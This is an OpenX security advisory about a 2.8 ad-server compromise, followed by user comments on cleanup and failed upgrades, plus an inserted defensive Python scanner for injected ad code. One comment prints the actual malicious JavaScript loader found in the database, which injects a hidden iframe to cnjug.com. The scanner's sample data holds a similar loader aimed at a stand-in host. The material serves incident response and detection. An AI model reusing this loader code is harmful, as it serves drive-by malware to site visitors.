Security is an important priority at OpenX and we’re constantly working to provide security patches and bug fixes as soon as we become aware of any potential issue. As these issues are discovered, we validate, patch and release as quickly as we can. But it’s important to understand that avoiding potential security issues also requires server administrators to be vigilant and upgrade their systems to new, patched versions as soon as they become available.
It has been brought to our attention that there is a vulnerability in the 2.8 downloadable version of OpenX that can result in a server running the downloaded version of OpenX being compromised. We have already closed this vulnerability with the latest version of our software. To avoid this issue, we recommend that all users immediately upgrade their systems to 2.8.7.
OpenX also provides both free and Enterprise hosted versions of the ad server. Both of these products are managed and operated by the OpenX team, including upgrades, maintenance, and security scans, freeing you and your team from handling such issues. If ad serving is mission-critical to your business, we suggest contacting our team to learn more about OpenX Enterprise.
When operating any software, especially software that interacts with the public, it is important to keep up to date with the latest version. And, as always, please let us know of any potential security problems by emailing security@openx.org.

Thanks guys, upgraded in 2 minutes without any problems. Keep up the good work. By the way, I still don't know how to run a popup in OpenX, but that's another issue…
Comment by Brano — September 15, 2010 @ 4:11 am
Only after a major site has an issue is the problem fixed. Good to see there is an official patch now.
Comment by Zealous — September 15, 2010 @ 6:07 am
My site was affected, I manually checked all my zones & banners for any injected code and upgraded my OpenX install.
But now my site is flagged by Google, and who knows how long until it's deflagged.
Comment by Canadaka — September 15, 2010 @ 9:31 am
Release notes don’t tell anything, also nothing on https://developer.openx.org/ like it says, … Direct selection of contract campaigns doesn’t work at all, it’s in issues list, how come this doesn’t get fixed for MONTHS?! If this isn’t a serious issue, I don’t know what is.
Comment by Evgen — September 15, 2010 @ 12:19 pm
OpenX 2.8.6 says
“Your version of OpenX is up-to-date. There are currently no updates available.”
You might want to update the update feed as well.
Comment by Jari — September 15, 2010 @ 3:11 pm
Shouldn’t this security update have been emailed to us all who registered in the newsletter??
Comment by Nick Galis — September 15, 2010 @ 4:36 pm
The lack of a clear diff file is disturbing, but also the fact that “forum.openx.org” seems to be inaccessible.
What’s going on? I actually have some very solid tips and hints that helped me solve some upgrade headaches. Why not allow people to share?
Comment by Jack — September 15, 2010 @ 4:38 pm
any quick tips to quickly remove the vulnerability WITHOUT doing the upgrade?
I mean we will upgrade soon but we would appreciate any hints on how to close the gap in the meantime.
e.g. we have a password protected www/admin folder, is this good enough?
Comment by Johny Cash — September 15, 2010 @ 4:43 pm
Is this vulnerability only related with the video upload plugin? or is there more to it?
http://www.h-online.com/security/news/item/Web-sites-distribute-malware-via-hacked-OpenX-servers-1079099.html
Comment by Johny Cash — September 15, 2010 @ 4:58 pm
Johny Cash,
Since there are a number of changes in the new version we strongly suggest you upgrade. If you cannot, then take a look at the code changes between your version and the versions for the code patches you will need. But again, this is a low impact upgrade, and does not touch your db data.
Mike
Comment by Michael Todd — September 15, 2010 @ 6:56 pm
Jari, Nick,
An in-product alert will start going out in the next hour.
Mike
Comment by Michael Todd — September 15, 2010 @ 6:58 pm
Even after the upgrade I was still infected. After grepping through all my sites files, I couldn’t find a trace of the 2 domains mentioned on my Google Safe Browsing diagnostic page. “cnjug.com” and “openx.net”.
However, I started manually going through each and every table in the OpenX database and I found malware code inserted in many of the append or prepend fields in several tables.
This was the code that I found and removed. Hopefully that's it now.
“var dc=document; var date_ob=new Date(); dc.cookie=’h1=o; path=/;’;if(dc.cookie.indexOf(’3=llo’) 0){
function clng(str1,str2,str3){var cou=new Array(‘cn’,'gt’,'tn’,'br’,'id’,'bg’,'pl’,'be’,'gp’,'my’,'th’,'iq’,'ro’,'ba’,'pk’,'tr’,'dz’,'ma’,'re’,'ae’,'gf’,'ru’,'om’,'il’,'gr’,'vn’,'kw’,'ci’,'sa’,'do’,'pt’,'hr’,'eg’,'qa’,'ro’,'tw’,'al’,'hk’,'ps’,'eg’,'do’,'lt’,'dk’,'jo’,'pk’,'ma’,'pr’,'mk’,'dz’,'ge’,'hr’,'gr’,'bg’,'ba’,'pt’,'si’,'tn’,'pl’,'be’,'ir’,'sk’,'hu’,'az’,'bo’,'by’,'cr’,'cz’,'ec’,'ee’,'lk’,'lv’,'md’,'mt’,'pa’,'rs’,'sv’,'tt’,'ua’,'uy’);
for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
if(typeof run == ‘undefined’){dc.writeln(“<!–”);dc.writeln(“var host=’ widt’+'h=1 h’+'eight’+'=1 ‘; var src=’src=’; var brdr=’fra’+'mebor’+'der=’+’0′;var sc=’\”http://cnjug.com/blog/index.php?s=IBB@G\” ‘;”);dc.writeln(“document.write(”);”);dc.writeln(“//–>”);} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie=’h3=llo; path=/; expires=’+date_ob.toGMTString();}”
Comment by Canadaka — September 15, 2010 @ 10:59 pm
It is possible that the attacker has already created his own administrator and admin accounts. Actually I was not able to see his accounts in 2.8.1; now I have upgraded, changed all passwords, deleted his accounts and sessions, deleted admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php, changed config to read only……any further ideas??
Comment by jirka — September 15, 2010 @ 11:46 pm
Just wanted to update, but inside the zip or tar files all plugin folders are empty. After the update I get the message, that plugins are missing. Is this an error?
Comment by gero — September 16, 2010 @ 12:00 am
The update went well but I may have made a mistake when asked for the path to the previous installation -> plugins are not working.
How can I sort this out? Tried several things but couldn’t find the solution.
Thanks in advance for your help,
J
Comment by Josep — September 16, 2010 @ 5:01 am
Big question here – if a site is already compromised will upgrading to 2.8.7 fix the problem or is the solution at that point to delete everything and start fresh?
Comment by Scott — September 16, 2010 @ 5:03 am
Does this vulnerability also exist for self-hosted OpenX 2.6, or are we safe running this version?
Upgrading to 2.8 is not an option for me at the moment.
Comment by Phil — September 16, 2010 @ 8:13 am
@Phil, speaking from experience, there are much worse vulnerabilities in 2.6.
Comment by ECO — September 16, 2010 @ 6:44 pm
Also upgraded from 2.8.5 to 2.8.7 but plugins are missing now and I don’t know how to fix it. I see that others are reporting same issue. The error message is as follows:
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXVideoAds.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXVideoAds.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXWorkflow.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXWorkflow.xml
Failed to find package definition file /home/hdtelevi/public_html/openx-2.8.5/plugins/etc/openXMarket.xml
…
and so on for all plugins.
I tried copying these files from backup location but error still exists.
Comment by Darco — September 16, 2010 @ 10:02 pm
For instructions on performing a security audit on a compromised OpenX installation, see the follow-up blog post: http://blog.openx.org/09/security-update-how-to-secure-your-openx-installation/
If there was a problem with the plugin installation during the upgrade, check the /path/to/openx/var/install.log for any potential issues, and once they’re resolved you can re-install the affected plugins (the .zip files for which can be found inside the openx-2.8.7.zip file in the etc/plugins folder)
Comment by Chris Nutting — September 17, 2010 @ 2:01 am
Bummer, I was affected and all the sites I serve ads to got blacklisted by Google as having malware. I had my host rollback my install to a few days before the hack and then I quickly upgraded (which was relatively easy).
My own PC got malware from my own sites! It was impossible to remove. The malware forced my PC to go through their proxy. I couldn't get to any of the malware removal sites (got 404s) and none of my antivirus, anti-malware apps would install or run. All my searches on Google would lead me to shopping sites. Fortunately I do full system backups (images) and could roll back.
Unfortunately my community forum members aren’t technical and a bunch of them are hosed. A super sickening feeling knowing my site caused it and nothing I can tell them to do to fix it.
Comment by OutsourcedMyLife — September 17, 2010 @ 6:03 am
Having same issue as Darco above, with plugins. Any resolution to this?
Comment by Torkil Johnsen — September 17, 2010 @ 9:09 am
Same issue as Darco with plugins …
Directories “admin/plugins” and “plugins/*” are empty !
Comment by Fixo — September 17, 2010 @ 10:15 am
Same issue here as well.. I found instructions for manually uninstalling the openx market plugin, but I still have those errors in my admin plugin section…
Comment by Mike — September 17, 2010 @ 1:05 pm
My Official Site have been hacked two times, last Aug 14 and now Sept 14. OpenX Ads Server have been hacked 2 times in 2 months. It’s very dangerous!
Comment by Catur Ujianto — September 17, 2010 @ 2:06 pm
Same issue as Darco and Fixo and Mike with plugins. This is so frustrating. I tried to do a clean install of version 2.8.7 and again had the issue with plugins. So my update from 2.8.5 to 2.8.7 failed, new install failed; the reason in both cases is the plugins, and I don't use any custom plugins, only those that are in by default, so it seems that the install is broken.
Comment by Vlad — September 18, 2010 @ 1:25 am
Hi, does someone have a download link for the standard plugins please?
Tried to update but the plugin directories are all empty. It was the same when I installed it the first time. I don't understand why the standard plugins are not inside the download package. As far as I know OpenX cannot be used without the standard plugins, isn't that right?
Comment by sascha — September 18, 2010 @ 1:02 pm
I’m on 2.8.5 now and I tried the upgrade and I also got the problem with all the standard plugins. I’m not even using the video plugin
The log complains about being unable to locate XML files
I just want to know what changed so I can change the code myself instead of upgrading.
Comment by ronnie — September 18, 2010 @ 3:16 pm
Path to previous OpenX installation
I'm hosed on the installation. Stuck on Step 3 of 5 with it can't find plugins. See tons of people with the same problem, and not one solution. This sucks that I first get hacked, then no solution.
Comment by Big Kahuna — September 19, 2010 @ 5:24 am
[...] on 09.17.10 at 10:56 am (comments) Yesterday, September 16th, 2010, a security vulnerability (OpenX Blog Security Update) in our ad server allowed an attacker to inject malicious JavaScript into the ads served on our [...]
Pingback by New java exploit.. - wizardmods Satellite TV Forum — September 19, 2010 @ 8:47 am
Same issue with missing plugins. V poor that no official answer to people with these problems. Same as well with repeated hacks of OpenX installs. Partly down to me being lazy and not upgrading and also in part to Invocation code showing the ******* version number in comment tag, makes it very easy for hackers to automate finding out of date installs. Surely not including these comments in the output would help the amount of people getting hit with this. I make sure I do not include the comments when adding invocation codes now…
Comment by Chief Chubba — September 19, 2010 @ 9:41 pm
I’ve just done the last update and since I noticed there was no more “code invocation” either for the website or for individual zones…
Can anyone help me on this?
Thanks
Comment by Antony — September 20, 2010 @ 2:27 pm
We’ve used OpenX for years. This latest security threat came out of nowhere and hit us hard. 72 hours later, we’re working hard to get relisted as a safe site with Google. It’s tanked our traffic today.
We found the solution though after upgrading, over 5,000 files were infected in the phpads_audit details column. Have your developers start their search there.
A sample search and results (x8 domains on our end, over 5,000 lines were removed:)
mysql> update phpads_audit set details='' where details like '%blamesllek%';
Query OK, 1262 rows affected (0.36 sec)
Rows matched: 1262 Changed: 1262 Warnings: 0
Hope this helps anyone else dealing with this issue.
Comment by Kevin McNeese — September 20, 2010 @ 10:42 pm
Same problem as everyone else above in regards to the plug-ins. I am trying to upgrade from 2.8.5 to 2.8.7 – It really shouldn’t be this difficult!
Why hasn’t anyone from OpenX commented on this since the problem seems to be with so many people?
Comment by MogulMan — September 21, 2010 @ 3:30 pm
I found a few fixes that might help. For the plugins – when it ask you to enter the path to your previous openx installation – you have to use the absolute server path. I was missing a / at the beginning and it wouldn’t work. When I added that / the plugin installation ran automatically. Your absolute server path would be something like:
/home/www/htdocs/yourwebsite/openx/
Using http://www.yourwebsite.com/openx will not work.
Comment by Bryan — September 21, 2010 @ 5:00 pm
Hi, after resolving our issue being blacklisted on google (disabling openX and removing malware links) we went about upgrading from 2.8.2 to 2.8.7
Followed all the steps correctly and installed the upgrade.
However the final step has failed (renaming old installation and renaming new folder e.g. /open_new renamed to /openx)
Warning: require_once(pre-check.php) [function.require-once]: failed to open stream: No such file or directory in ****/openx_new/init.php on line 35
Fatal error: require_once() [function.require]: Failed opening required ‘pre-check.php’ (include_path=’.:/usr/share/pear’) in ****/openx_new/init.php on line 35
I can’t find or work out where the references to the openx_new folder are?? very confusing. Followed each step exactly.
Can still run the old interface if i rename the folders back to their original state but this obviously isn’t the completed upgrade.
e.g. You are currently using OpenX v2.8.2 (warning: database is stamped as v2.8.7) running on Apache 2.2.3, PHP 5.2.10 and MySQL 5.0.77-log.
Comment by Jay — September 22, 2010 @ 4:58 pm
@Bryan: nice for you but it doesn't work here…
I try to upgrade 2.8.5 => 2.8.7 … with relative OR absolute path “install.log” says :
Plugin: openXBannerTypes – Unable to locate XML files
Plugin: openXDeliveryLimitations – Unable to locate XML files
Plugin: openX3rdPartyServers – Unable to locate XML files
Plugin: openXReports – Unable to locate XML files
Plugin: openXDeliveryCacheStore – Unable to locate XML files
…..
Please help, i don’t want to be blacklisted by google (!)
Comment by Fixo — September 23, 2010 @ 1:31 pm
[...] Our host was very quick to patch the hole you’re talking about. Our problem was related to this: link An armed society is a polite society. Manners are good when one may have to back up his acts [...]
Pingback by Site tried to download files this morning — September 23, 2010 @ 6:09 pm
Same problem here with the plugins. Please provide some help!
Comment by Maragues — September 23, 2010 @ 9:38 pm
Also had the plugin problem and missing invocation code dropdown (caused by lack of invocation plugin). As mentioned above it seems there is an issue copying the old plugins folder during install. If you managed to keep a copy of your previous installation you can simply move the contents of the old plugins folder to the new plugins folder to fix it. After this you can re-enable your various plugins. I guess if you did not keep your old install then do a new install (not an upgrade) in a separate folder and copy the plugins folder from there.
Comment by Alex — September 24, 2010 @ 9:04 am
Same problem when trying to upgrade from 2.8.5 to 2.8.7.
Disappointed, no official response yet.
Comment by Octavian — September 25, 2010 @ 2:21 am
[...] encourages users and administrators to read the information available on the OpenX blog "Security Update" and to upgrade to OpenX 6.8.7. OpenX users can also read information from [...]
Pingback by OpenX has released a security update | SecurityNews — September 27, 2010 @ 7:08 am
I tried to upgrade with the usual procedure, entered the correct full file system path, but still got “One or more plugin files couln’t be located” with this error message in install.log: Plugin: openXVideoAds – Unable to locate file: /my/full/path/www_openx_2.8.5/www/admin/extensions/videoReport/lib/ofc2/ofc_upload_image.php
I had to revert the upgrade and restore from backup, so now my site is vulnerable again
Comment by René — September 27, 2010 @ 11:04 am
Regarding the error with plugins… I had the same issue and could not resolve it. However… I killed that tab, visited site/new folder and it was running fine.
So, before you revert, check out the /new folder.
I renamed the folder to finish the transfer and 2.8.7 is running smoothly.
This is totally wanky, but at least I am secure now…. ?
Comment by Kamen — September 28, 2010 @ 2:10 am
Regarding plugin issue, you just need to copy plugin data from your old installation to the appropriate folders in the new one. New installation has all the folders in place, you just need to copy subfolders and .xml files to the right place and all will be working fine!
Comment by Darco — September 29, 2010 @ 8:05 pm
I am making an attempt to install the latest version of OpenX. It is a fresh install. I noted however that the plugin folders are empty. They only have their plug in names. Where can I find these plugins? Thanks
Comment by Ilocos — October 2, 2010 @ 11:22 am
Regarding the plugin issue… does anybody know why the plugins are not in the download file? Why are all the plugins not part of the official download package????
And why is there no direct link to the plugins download on the page?
OpenX won't run without the plugins, or am I wrong???
Comment by sascha — October 5, 2010 @ 12:30 pm
FYI – as mentioned earlier in this thread, if you look in the 2.8.7 zip package \etc\plugins folder, NOT the \plugins (that is empty for some reason), you will see zip files for each plug-in.
Comment by kboone — October 6, 2010 @ 3:52 pm
[...] encourages users and administrators to review the OpenX “Security Update” blog entry and upgrade to OpenX 6.8.7 to help mitigate the risks. OpenX users are also encouraged to review [...]
Pingback by SPiZaD » Adobe Releases Security Updates for Reader and Acrobat — October 7, 2010 @ 3:16 am
[...] http://blog.openx.org/09/security-update/ [...]
Pingback by Bogdan Turcanu » Blog Archive » Troubles with OpenX — October 7, 2010 @ 3:02 pm
Was running self hosted OpenX 2.8.5 when the site got hit with Malware. Went through the upgrade process to 2.8.7 and ran into the plugin issue that so many have mentioned above. Since I do not have patience to debug the problems while my site is still flagged as an attack site in Google, I just removed the old installation and its database completely and installed a fresh, and supposedly secure, 2.8.7 version. Set up the ads, asked Google for reconsideration and waited.
Within 3 hours the 2.8.7 version was infected with malware again.
At that point I ditched OpenX and moved to a different ad server.
Comment by Arohan — October 21, 2010 @ 8:12 pm
Plugins error, the issue I see is the upgrade is looking in /www/admin/extensions
but the plugins are in /www/admin/plugins
Comment by goodgirl — October 24, 2010 @ 9:29 pm
To Darco: Thank you, but I have no ".xml files" in plugins?! Just subfolders… and the message is the same, "One or more plugin files couln't be located".
It’s impossible to continue for me.
Have you an idea ?
Thank you for your help
Comment by Olivier — October 25, 2010 @ 11:52 am
To Darco: I have .xml files in "/etc/", just there, right?
Comment by Olivier — October 25, 2010 @ 12:10 pm
To Darco : I don’t know why but it’s ok now…
Comment by Olivier — October 25, 2010 @ 3:12 pm
I found a missing file reference in the videoReport plugin. Delete the following line from ‘plugins/etc/videoReport/videoReport.xml’ and the installation will continue.
<file path="{ADMINPATH}/lib/ofc2/">ofc_upload_image.php</file>
The installation did continue fine so I'm not sure what the missing file is used for. We don't use that plugin so it's a moot point for us.
Best,
Gary
Comment by Gary — October 25, 2010 @ 7:46 pm
You are wrong. I am sure of it. Let's discuss it. Write to me by email, we'll talk.
Comment by Сергей — November 7, 2010 @ 5:22 am
I installed OpenX, Open Ads actually, on many websites about 8 years ago. It was much simpler. I don't believe installations should become more complicated over time. There is really an issue with the plug-ins. Actually it's not really an issue, it's just a little annoyance made to maximize the number of people who will need to pay for support. A lot of developers do that: misplace or zip a few key files here and there and you make money from the install. You can do better, guys. Open Ads was hassle free, it was open source; you guys are like Microsoft now!
Comment by Patrick — November 8, 2010 @ 12:53 am
My site was compromised… new user accounts were created in the ad system (openx_users table) and malware delivery code was being appended to the banners. I manually cleaned the OpenX database of users and append code, then upgraded to 2.8.7. If you are going down this path, do not forget to delete any additional users you do not recognize!! It's a shame this was not mentioned above.
Comment by Jason — November 8, 2010 @ 3:38 am
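The database cleanup that Canadaka, Kevin McNeese and Jason describe above (injected script in banner and zone append/prepend fields, the audit trail's details column, and unexpected user accounts), as an added example that is not OpenX's own code or any commenter's. The table prefix (ox_ or phpads_) and the column names bannerid, zoneid, auditid, user_id, username and email_address are assumptions about the 2.8 schema; check them against your install before running the generated SQL.

```python
"""Added example, not OpenX's own code: flag injected script in the free-text
fields the commenters found contaminated and emit the SQL to pull those rows
and the user list for manual review. Schema names are assumptions (OpenX 2.8,
ox_ prefix by default, phpads_ on installs upgraded from older versions)."""
import re

# Heuristics for injected content: script tags, .write/.writeln calls (the
# pasted loader aliases document as dc), iframes, and URLs to hosts you did
# not put in the field yourself.
INJECTION_PATTERNS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"\.write(?:ln)?\s*\(", re.I),
    re.compile(r"<\s*iframe", re.I),
    re.compile(r"https?://[^\s'\"<>]+", re.I),
]

# table -> (assumed primary key column, free-text columns worth scanning)
TEXT_FIELDS = {
    "banners": ("bannerid", ["append", "prepend"]),
    "zones": ("zoneid", ["append", "prepend"]),
    "audit": ("auditid", ["details"]),
}


def injection_hits(text, allowed_hosts=()):
    """Return suspicious fragments in text; URLs to allowed hosts are skipped."""
    hits = []
    for pat in INJECTION_PATTERNS:
        for m in pat.finditer(text or ""):
            frag = m.group(0)
            if frag.lower().startswith("http") and any(
                h in frag.lower() for h in allowed_hosts
            ):
                continue
            hits.append(frag)
    return hits


def scan_rows(table, rows, allowed_hosts=()):
    """rows: dicts as fetched from {prefix}{table}. Returns [(row id, column, hits)]."""
    id_col, cols = TEXT_FIELDS[table]
    findings = []
    for row in rows:
        for col in cols:
            hits = injection_hits(row.get(col), allowed_hosts)
            if hits:
                findings.append((row[id_col], col, hits))
    return findings


def audit_queries(prefix="ox_"):
    """SQL to pull candidate rows, plus a listing of every account to review."""
    queries = []
    for table, (id_col, cols) in TEXT_FIELDS.items():
        for col in cols:
            queries.append(
                f"SELECT {id_col}, {col} FROM {prefix}{table} "
                f"WHERE {col} LIKE '%<script%' OR {col} LIKE '%document.write%';"
            )
    queries.append(f"SELECT user_id, username, email_address FROM {prefix}users;")
    return queries


# Constructed sample rows (not real data): a legitimate tracking pixel and an
# injected loader shaped like the one pasted in the comments above.
SAMPLE_ZONES = [
    {"zoneid": 1, "append": '<img src="http://stats.example.org/px.gif">', "prepend": ""},
    {"zoneid": 2, "append": "",
     "prepend": "var dc=document;dc.writeln(\"<!--\");var sc='http://malware.example/index.php';"},
]

if __name__ == "__main__":
    for finding in scan_rows("zones", SAMPLE_ZONES, allowed_hosts=("stats.example.org",)):
        print(finding)
    print("\n".join(audit_queries("phpads_")))
```

Run the generated SELECTs in the mysql client first and only issue UPDATEs against rows you have confirmed by eye, as Kevin did with phpads_audit.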
Same problem as everyone concerning plugins!…
Comment by Steph — December 23, 2010 @ 9:41 am